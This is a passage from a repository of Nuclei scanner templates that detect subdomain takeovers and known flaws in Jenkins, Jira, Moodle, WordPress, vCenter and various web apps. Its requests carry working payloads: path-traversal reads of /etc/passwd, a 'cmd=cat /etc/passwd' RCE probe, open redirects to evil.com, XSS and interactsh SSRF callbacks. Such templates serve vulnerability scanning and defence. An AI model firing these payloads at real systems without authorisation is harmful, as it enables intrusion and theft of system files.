Please renew your subscription"
25 | negative: true
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/uberflip-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: uberflip-takeover
2 |
3 | info:
4 | name: uberflip takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - "Non-hub domain, The URL you've accessed does not provide a hub."
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/uptimerobot-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: uptimerobot-takeover
2 |
3 | info:
4 | name: uptimerobot takeover detection
5 | author: pdteam
6 | severity: low
7 | reference:
8 | - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/
9 | - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45
10 | tags: takeover
11 |
12 | requests:
13 | - method: GET
14 | path:
15 | - "{{BaseURL}}"
16 |
17 | matchers-condition: and
18 | matchers:
19 | - type: regex
20 | regex:
21 | - "^page not found$"
22 |
23 | - type: status
24 | status:
25 | - 404
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/vend-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: vend-takeover
2 |
3 | info:
4 | name: vend takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Looks like you've traveled too far into cyberspace.
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/webflow-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: webflow-takeover
2 |
3 | info:
4 | name: webflow takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - The page you are looking for doesn't exist or has been moved.
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/wishpond-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: wishpond-takeover
2 |
3 | info:
4 | name: wishpond takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - https://www.wishpond.com/404?campaign=true
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/worksites-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: worksites-takeover
2 |
3 | info:
4 | name: worksites takeover detection
5 | author: melbadry9
6 | severity: high
7 | reference:
8 | - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: regex
18 | regex:
19 | - "(?:Company Not Found|you’re looking for doesn’t exist)"
20 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/wufoo-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: wufoo-takeover
2 |
3 | info:
4 | name: wufoo takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Profile not found
20 | - Hmmm....something is not right.
21 | condition: and
--------------------------------------------------------------------------------
/web/pocs/nuclei/takeovers/zendesk-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: zendesk-takeover
2 |
3 | info:
4 | name: zendesk takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - this help center no longer exists
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/generic/generic-blind-xxe.yaml:
--------------------------------------------------------------------------------
1 | id: generic-blind-xxe
2 |
3 | info:
4 | name: Generic Blind XXE
5 | author: geeknik
6 | severity: high
7 | tags: xxe,generic,blind
8 |
9 | requests:
10 | - raw:
11 | - |
12 | POST / HTTP/1.1
13 | Host: {{Hostname}}
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
15 | Referer: {{BaseURL}}
16 |
17 |
18 |
19 | &e1;
20 |
21 | matchers:
22 | - type: word
23 | part: interactsh_protocol
24 | words:
25 | - "http"
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:
--------------------------------------------------------------------------------
1 | id: jenkins-async-people
2 |
3 | info:
4 | name: Jenkins panel async-people
5 | author: nadino
6 | severity: info
7 | reference:
8 | - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944
9 | - https://issues.jenkins.io/browse/JENKINS-30107
10 | - https://issues.jenkins.io/browse/JENKINS-18884
11 | - https://issues.jenkins.io/browse/JENKINS-26469
12 | tags: jenkins
13 |
14 | requests:
15 | - method: GET
16 | path:
17 | - "{{BaseURL}}/asynchPeople/"
18 | matchers:
19 | - type: word
20 | words:
21 | - "People - [Jenkins]"
22 | part: body
23 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml:
--------------------------------------------------------------------------------
1 | id: unaunthenticated-jenkin
2 |
3 | info:
4 | name: Unauthenticated Jenkins Dashboard
5 | author: dhiyaneshDK
6 | severity: high
7 | tags: jenkins
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - Dashboard [Jenkins]
19 | condition: and
20 |
21 | - type: status
22 | status:
23 | - 200
24 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/jira/jira-unauthenticated-projects.yaml:
--------------------------------------------------------------------------------
1 | id: jira-unauthenticated-projects
2 |
3 | info:
4 | name: Jira Unauthenticated Projects
5 | author: TechbrunchFR
6 | severity: info
7 | tags: atlassian,jira
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100"
13 | matchers:
14 | - type: word
15 | words:
16 | - 'projects'
17 | - 'startAt'
18 | - 'maxResults'
19 | condition: and
20 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:
--------------------------------------------------------------------------------
1 | id: jira-unauthenticated-user-picker
2 |
3 | info:
4 | name: Jira Unauthenticated User Picker
5 | author: TechbrunchFR
6 | severity: info
7 | tags: atlassian,jira
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa"
13 | matchers:
14 | - type: word
15 | words:
16 | - 'user-picker'
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: moodle-filter-jmol-lfi
2 |
3 | info:
4 | name: Moodle filter_jmol - LFI
5 | author: madrobot
6 | severity: high
7 | description: Local file inclusion on Moodle.
8 | tags: moodle,lfi
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
14 | matchers-condition: and
15 | matchers:
16 | - type: status
17 | status:
18 | - 200
19 | - type: regex
20 | regex:
21 | - "root:.*:0:0:"
22 | part: body
23 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/aspnuke-openredirect.yaml:
--------------------------------------------------------------------------------
1 | id: aspnuke-openredirect
2 |
3 | info:
4 | name: ASP-Nuke Open Redirect
5 | author: pdteam
6 | severity: low
7 | tags: aspnuke,redirect
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
13 |
14 | matchers:
15 | - type: regex
16 | part: header
17 | regex:
18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: blue-ocean-excellence-lfi
2 |
3 | info:
4 | name: Blue Ocean Excellence LFI
5 | author: pikpikcu
6 | severity: high
7 | reference:
8 | - https://blog.csdn.net/qq_41901122/article/details/116786883
9 | tags: blue-ocean,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: regex
20 | regex:
21 | - "toor:[x*]:0:0"
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/dss-download-fileread.yaml:
--------------------------------------------------------------------------------
1 | id: dss-download-fileread
2 |
3 | info:
4 | name: DSS Download File Read
5 | author: ritikchaddha
6 | severity: high
7 | tags: lfi,dss,lfr
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
13 |
14 | redirects: true
15 | max-redirects: 2
16 | matchers-condition: and
17 | matchers:
18 | - type: regex
19 | regex:
20 | - "root:[x*]:0:0:"
21 |
22 | - type: status
23 | status:
24 | - 200
25 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: ecology-filedownload-directory-traversal
2 |
3 | info:
4 | name: Ecology Directory Traversal
5 | author: princechaddha
6 | severity: medium
7 | metadata:
8 | fofa-query: app="泛微-协同办公OA"
9 | tags: ecology,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
15 | matchers-condition: and
16 | matchers:
17 | - type: status
18 | status:
19 | - 200
20 | - type: word
21 | words:
22 | - "/weaver/"
23 | part: body
24 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/ecology-springframework-directory-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: ecology-springframework-directory-traversal
2 |
3 | info:
4 | name: Ecology Springframework Directory Traversal
5 | author: princechaddha
6 | severity: medium
7 | tags: ecology,springframework,lfi
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
13 | matchers-condition: and
14 | matchers:
15 | - type: status
16 | status:
17 | - 200
18 | - type: word
19 | words:
20 | - "/weaver/"
21 | part: body
22 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/empirecms-xss.yaml:
--------------------------------------------------------------------------------
1 | id: empirecms-xss
2 |
3 | info:
4 | name: EmpireCMS v75 XSS
5 | author: pikpikcu
6 | severity: medium
7 | reference:
8 | - https://www.geek-share.com/detail/2777280260.html
9 | tags: empirecms,xss
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: word
20 | words:
21 | - 'onmousewheel=\"return bbimg(this)\"'
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/flir-path-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: flir-path-traversal
2 |
3 | info:
4 | name: Flir Path Traversal
5 | author: pikpikcu
6 | severity: high
7 | reference:
8 | - https://juejin.cn/post/6961370156484263972
9 | tags: flir,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/download.php?file=/etc/passwd"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: regex
20 | regex:
21 | - "root:.*:0:0:"
22 | condition: and
23 |
24 | - type: status
25 | status:
26 | - 200
27 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/groupoffice-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: groupoffice-lfi
2 |
3 | info:
4 | name: Groupoffice 3.4.21 Directory Traversal Vulnerability
5 | author: 0x_Akoko
6 | severity: high
7 | reference:
8 | - https://cxsecurity.com/issue/WLB-2018020249
9 | - http://www.group-office.com
10 | tags: groupoffice,lfi,traversal
11 |
12 | requests:
13 | - method: GET
14 | path:
15 | - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"
16 |
17 | matchers-condition: and
18 | matchers:
19 |
20 | - type: regex
21 | regex:
22 | - "root:[x*]:0:0"
23 |
24 | - type: status
25 | status:
26 | - 200
27 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/huawei-hg659-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: huawei-hg659-lfi
2 |
3 | info:
4 | name: HUAWEI HG659 LFI
5 | author: pikpikcu
6 | severity: high
7 | reference:
8 | - https://twitter.com/sec715/status/1406782172443287559
9 | tags: lfi,huawei
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: regex
20 | regex:
21 | - "root:.*:0:0:"
22 | condition: and
23 |
24 | - type: status
25 | status:
26 | - 200
27 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/myucms-lfr.yaml:
--------------------------------------------------------------------------------
1 | id: myucms-lfr
2 |
3 | info:
4 | name: MyuCMS Local File Read
5 | author: princechaddha
6 | severity: high
7 | reference:
8 | - https://blog.csdn.net/yalecaltech/article/details/104908257
9 | tags: myucms,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
15 | matchers:
16 | - type: regex
17 | regex:
18 | - "root:.*:0:0:"
19 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/natshell-path-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: natshell-path-traversal
2 |
3 | info:
4 | name: NatShell Path Traversal
5 | author: pikpikcu
6 | severity: high
7 | reference:
8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
9 | metadata:
10 | fofa-query: title="蓝海卓越计费管理系统"
11 | tags: natshell,lfi
12 |
13 | requests:
14 | - method: GET
15 | path:
16 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
17 |
18 | matchers-condition: and
19 | matchers:
20 |
21 | - type: regex
22 | regex:
23 | - "toor:[x*]:0:0"
24 |
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/natshell-rce.yaml:
--------------------------------------------------------------------------------
1 | id: natshell-rce
2 |
3 | info:
4 | name: NatShell Debug File RCE
5 | author: pikpikcu
6 | severity: critical
7 | reference:
8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
9 | tags: natshell,rce
10 |
11 | requests:
12 | - method: POST
13 | path:
14 | - "{{BaseURL}}/debug.php"
15 | body: |
16 | cmd=cat /etc/passwd
17 |
18 | matchers-condition: and
19 | matchers:
20 |
21 | - type: regex
22 | regex:
23 | - "toor:[x*]:0:0"
24 |
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/pacsone-server-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: pacsone-server-lfi
2 |
3 | info:
4 | name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
5 | author: 0x_Akoko
6 | severity: high
7 | reference:
8 | - https://cxsecurity.com/issue/WLB-2018010303
9 | tags: pacsone,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: regex
19 | regex:
20 | - "root:[x*]:0:0"
21 |
22 | - type: status
23 | status:
24 | - 200
25 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/pmb-local-file-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: pmb-local-file-disclosure
2 |
3 | info:
4 | name: PMB 5.6 - getgif.php Arbitrary File Retrieval
5 | author: dhiyaneshDk
6 | severity: high
7 | reference:
8 | - https://www.exploit-db.com/exploits/49054
9 | tags: lfi,pmb
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: status
19 | status:
20 | - 200
21 | - type: word
22 | words:
23 | - "root:x:0"
24 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/spark-webui-unauth.yaml:
--------------------------------------------------------------------------------
1 | id: spark-webui-unauth
2 |
3 | info:
4 | name: Unauthenticated Spark WebUI
5 | author: princechaddha
6 | severity: medium
7 | reference:
8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc
9 | tags: spark,unauth
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: status
19 | status:
20 | - 200
21 | - type: word
22 | words:
23 | - "Spark Master at spark://"
24 | - "<strong>URL:</strong>"
25 | part: body
26 | condition: and
27 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/symantec-messaging-gateway.yaml:
--------------------------------------------------------------------------------
1 | id: symantec-messaging-gateway
2 |
3 | info:
4 | name: Symantec Messaging Gateway LFI
5 | author: Random_Robbie
6 | severity: medium
7 | description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
8 | tags: lfi,messaging,symantec
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"
14 |
15 | matchers-condition: and
16 | matchers:
17 | - type: word
18 | words:
19 | - "struts-default.xml"
20 |
21 | - type: status
22 | status:
23 | - 200
24 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/thinkific-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: thinkific-redirect
2 |
3 | info:
4 | name: Open Redirect vulnerability on thinkific websites
5 | author: Gal Nagli
6 | severity: medium
7 | tags: redirect
8 |
9 | requests:
10 | - method: GET
11 |
12 | path:
13 | - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
14 |
15 | matchers-condition: and
16 | matchers:
17 | - type: status
18 | status:
19 | - 302
20 | - type: word
21 | words:
22 | - "<a href=\"http://evil.com?kind=jwt&message=Nil+JSON+web+token\""
23 | condition: or
24 | part: body
25 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/tpshop-directory-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: tpshop-directory-traversal
2 |
3 | info:
4 | name: TPshop Directory Traversal
5 | author: pikpikcu
6 | severity: high
7 | reference:
8 | - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
9 | tags: tpshop,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: word
20 | words:
21 | - '"state":"SUCCESS"'
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/other/unauth-rlm.yaml:
--------------------------------------------------------------------------------
1 | id: unauth-rlm
2 |
3 | info:
4 | name: Unauthenticated Reprise License Manager
5 | author: Akincibor
6 | severity: critical
7 | tags: unauth,rlm
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/goforms/menu"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: status
17 | status:
18 | - 200
19 |
20 | - type: word
21 | part: body
22 | words:
23 | - "RLM Administration Commands"
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/ransomware/deadbolt-ransomware.yaml:
--------------------------------------------------------------------------------
1 | id: deadbolt-ransomware
2 |
3 | info:
4 | name: Deadbolt Ransomware Detection
5 | author: pdteam
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "<title>ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT."
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: samsung-wlan-ap-lfi
2 |
3 | info:
4 | name: Samsung Wlan AP (WEA453e) LFI
5 | author: pikpikcu
6 | severity: critical
7 | reference:
8 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
9 | tags: xss,samsung,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/(download)/etc/passwd"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: regex
19 | regex:
20 | - "root:.*:0:0:"
21 | - "bin:.*:1:1"
22 | part: body
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml:
--------------------------------------------------------------------------------
1 | id: vmware-vcenter-lfi-linux
2 |
3 | info:
4 | name: Vmware Vcenter LFI for Linux appliances
5 | author: PR3R00T
6 | severity: high
7 | tags: vmware,lfi,vcenter
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/eam/vib?id=/etc/issue"
13 | matchers:
14 | - type: word
15 | words:
16 | - "vCenter Server"
17 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:
--------------------------------------------------------------------------------
1 | id: vmware-vcenter-ssrf
2 |
3 | info:
4 | name: VMware vCenter SSRF/LFI/XSS
5 | author: pdteam
6 | severity: critical
7 | reference:
8 | - https://github.com/l0ggg/VMware_vCenter
9 | tags: ssrf,lfi,xss,oast,vcenter,vmware
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: word
19 | part: interactsh_protocol
20 | words:
21 | - "http"
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-db-backup-listing
2 |
3 | info:
4 | name: WordPress DB Backup
5 | author: Suman_Kar
6 | severity: medium
7 | tags: wordpress,backup
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/wp-content/uploads/database-backups/"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - "Index of /"
19 | - "wp-content/uploads/database-backups"
20 | - ".sql"
21 | condition: and
22 | part: body
23 |
24 | - type: status
25 | status:
26 | - 200
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-db-backup.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-db-backup
2 |
3 | info:
4 | name: WordPress DB Backup
5 | author: dwisiswant0
6 | severity: medium
7 | tags: wordpress,backups
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/wp-content/backup-db/"
13 | matchers-condition: and
14 | matchers:
15 | - type: word
16 | words:
17 | - "Index of /"
18 | - ".sql\">"
19 | condition: and
20 | part: body
21 | - type: status
22 | status:
23 | - 200
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-directory-listing.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-directory-listing
2 |
3 | info:
4 | name: Wordpress directory listing
5 | author: Manas_Harsh
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/wp-content/uploads/"
13 | - "{{BaseURL}}/wp-content/themes/"
14 | - "{{BaseURL}}/wp-content/plugins/"
15 | - "{{BaseURL}}/wp-includes/"
16 |
17 | matchers-condition: and
18 | matchers:
19 | - type: status
20 | status:
21 | - 200
22 |
23 | - type: word
24 | words:
25 | - "Index of /"
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-installer-log.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-installer-log
2 |
3 | info:
4 | name: WordPress Installer Log
5 | author: dwisiswant0
6 | severity: info
7 | tags: wordpress,log
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/installer-log.txt"
13 | matchers-condition: and
14 | matchers:
15 | - type: regex
16 | regex:
17 | - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG"
18 | part: body
19 | - type: status
20 | status:
21 | - 200
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-social-metrics-tracker
2 |
3 | info:
4 | name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
5 | author: randomrobbie
6 | severity: medium
7 | tags: wordpress,wp-plugin
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: status
17 | status:
18 | - 200
19 | - type: word
20 | words:
21 | - "Main URL to Post"
22 | part: body
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-ssrf-oembed
2 |
3 | info:
4 | name: Wordpress Oembed Proxy SSRF
5 | author: dhiyaneshDk
6 | severity: medium
7 | reference:
8 | - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
9 | - https://github.com/incogbyte/quickpress/blob/master/core/req.go
10 | tags: wordpress,ssrf,oast,proxy
11 |
12 | requests:
13 | - method: GET
14 | path:
15 | - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
16 |
17 | matchers:
18 | - type: word
19 | part: interactsh_protocol
20 | words:
21 | - "http"
22 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wordpress-user-enum.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-user-enum
2 |
3 | info:
4 | name: Wordpress User Enumeration
5 | author: r3dg33k
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/?author=1"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: regex
17 | regex:
18 | - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+'
19 | part: header
20 | - type: status
21 | status:
22 | - 301
23 |
24 | extractors:
25 | - type: regex
26 | part: header
27 | regex:
28 | - 'author\/\w+'
29 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-config-setup.yaml:
--------------------------------------------------------------------------------
1 | id: wp-config-setup
2 |
3 | info:
4 | name: WordPress Setup Configuration
5 | author: princechaddha
6 | severity: high
7 | reference:
8 | - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
9 | tags: wordpress,setup
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/wp-admin/setup-config.php?step=1"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: word
19 | words:
20 | - "Below you should enter your database connection details."
21 |
22 | - type: status
23 | status:
24 | - 200
25 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-enabled-registration.yaml:
--------------------------------------------------------------------------------
1 | id: wp-enabled-registration
2 |
3 | info:
4 | name: WordPress user registration enabled
5 | author: Ratnadip Gajbhiye
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/wp-login.php?action=register'
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - Register For This Site
19 | - E-mail
20 | condition: and
21 | part: body
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-license-file.yaml:
--------------------------------------------------------------------------------
1 | id: wp-license-file
2 |
3 | info:
4 | name: WordPress license file disclosure
5 | author: yashgoti
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/license.txt"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - "WordPress - Web publishing software"
